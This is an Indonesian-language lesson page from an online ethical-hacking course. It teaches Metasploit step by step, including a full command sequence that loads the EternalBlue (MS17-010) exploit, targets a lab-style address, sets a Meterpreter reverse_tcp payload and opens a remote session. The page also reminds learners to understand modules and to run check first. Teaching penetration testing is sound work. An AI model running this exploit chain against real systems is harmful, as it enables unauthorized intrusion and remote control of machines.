Mencari dan Menggunakan Exploit
Menemukan dan menjalankan
Mencari dan Menggunakan Exploit adalah pelajaran Ethical Hacking Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Ethical Hacking Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.
Dari Pengintaian ke Eksploitasi
Setelah melakukan pemindaian, Anda mengetahui layanan dan versi target. Langkah berikutnya adalah menemukan modul eksploit yang cocok dengan kerentanan yang diketahui pada versi tersebut.
Perintah pencarian Metasploit merupakan pintu masuk Anda ke ribuan modul. Pencarian yang tepat menghemat waktu dan mencegah Anda menjalankan kode yang keliru.
Pencarian Dasar
Perintah search melakukan kueri pada indeks modul berdasarkan kata kunci. Anda dapat mencari berdasarkan nama perangkat lunak, CVE, atau layanan.
search eternalblue
search type:exploit platform:windows smbFilter Pencarian
Persempit hasil dengan filter:
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: pengenal CVE tertentu.
- rank: sangat baik, hebat, baik (keandalan).
Menggabungkan filter dengan cepat mempersempit ribuan modul menjadi beberapa modul saja.
search cve:2017-0144 type:exploitMembaca Hasil Pencarian
Hasil pencarian mencantumkan setiap modul beserta peringkat, tanggal pengungkapan, dan indikator pemeriksaan. Peringkat tersebut mencerminkan keandalan dan keamanan eksploit.
- sangat baik: kecil kemungkinan membuat target terhenti.
- hebat/baik: andal dalam kondisi umum.
- rendah/manual: berisiko atau memerlukan penyiapan yang cermat.
Utamakan modul dengan peringkat lebih tinggi agar sistem produksi tidak terhenti.
Memuat Modul
Gunakan nomor indeks modul atau jalur lengkapnya dengan use. Prompt berubah untuk menampilkan modul yang dimuat, dan penyimpanan data kini berisi opsi modul tersebut.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >Memeriksa Modul
Sebelum menjalankannya, bacalah informasi tentang modul tersebut. info menampilkan deskripsi, referensi (CVE, imbauan keamanan), opsi yang diperlukan, dan target yang didukung.
Memahami fungsi modul merupakan bagian dari penggunaan profesional dan bertanggung jawab; jangan pernah menjalankan eksploit yang tidak Anda pahami.
info
show options
show targetsMengatur Opsi
Konfigurasikan opsi yang diperlukan dengan set. Opsi umum untuk eksploit jarak jauh adalah alamat target dan pengaturan muatan Anda.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2Perintah check
Banyak eksploit mendukung check, yang menguji dengan aman apakah target tampaknya rentan tanpa benar-benar mengeksploitasinya.
Menjalankan check terlebih dahulu merupakan praktik yang baik: langkah ini mengurangi risiko sistem mengalami kerusakan dan memastikan Anda akan menggunakan waktu untuk peluang yang benar-benar ada.
check
# [+] 10.10.10.40:445 - The target is vulnerable.Memilih Muatan
Sebuah eksploit memerlukan muatan. Metasploit memilih muatan bawaan, tetapi Anda dapat menampilkan daftar dan memilih muatan yang sesuai dengan target serta kebutuhan akses Anda.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpMenjalankan dan Mengelola Sesi
Luncurkan dengan exploit (atau run). Jika berhasil, Anda mendapatkan sebuah sesi, yaitu koneksi interaktif ke target.
Kelola beberapa sesi dengan sessions -l untuk menampilkan daftar dan sessions -i N untuk berinteraksi. Jalankan sesi di latar belakang dengan background agar Anda dapat terus bekerja di konsol.
exploit
sessions -l
sessions -i 1Opsi Global vs Modul
Beberapa pengaturan, seperti LHOST, digunakan ulang di banyak modul. Tetapkan pengaturan tersebut secara global dengan setg agar Anda tidak perlu mengetikkannya lagi setiap kali berganti modul.
set: hanya berlaku untuk modul saat ini.setg: berlaku secara global di seluruh modul.unsetg: menghapus nilai global.
Ini menghemat waktu selama pengujian panjang yang menggunakan banyak modul.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40Pemeriksaan Singkat
Pilih langkah yang bertanggung jawab sebelum menjalankan eksploit.
Rangkuman
Anda telah mempelajari cara menemukan dan menjalankan eksploit:
- Gunakan search dengan penyaring (jenis, platform, cve, peringkat) untuk menemukan modul.
- Utamakan modul dengan peringkat lebih tinggi demi keandalan dan keamanan.
- Gunakan use untuk memuat, info/show options untuk memeriksa, dan set untuk mengonfigurasi.
- Jalankan check terlebih dahulu, lalu exploit untuk memperoleh sebuah sesi.
- Kelola sesi dengan sessions -l/-i.
Berikutnya: muatan dan shell pascaeksploitasi Meterpreter.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Mencari dan Menggunakan Exploit” gratis?
Ya — teks lengkap “Mencari dan Menggunakan Exploit” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Ethical Hacking Academy, upgrade ke CoddyKit PRO. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Mencari dan Menggunakan Exploit”?
Menemukan dan menjalankan Kamu berlatih Ethical Hacking Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Ethical Hacking Academy?
Tidak diperlukan pengalaman sebelumnya. Ethical Hacking Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.
Berapa lama pelajaran “Mencari dan Menggunakan Exploit” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Ethical Hacking Academy ini?
Ya. Setiap pelajaran Ethical Hacking Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Arsitektur Metasploit
- Mencari dan Menggunakan Exploit
- Payload dan Meterpreter
- Modul Pasca-Eksploitasi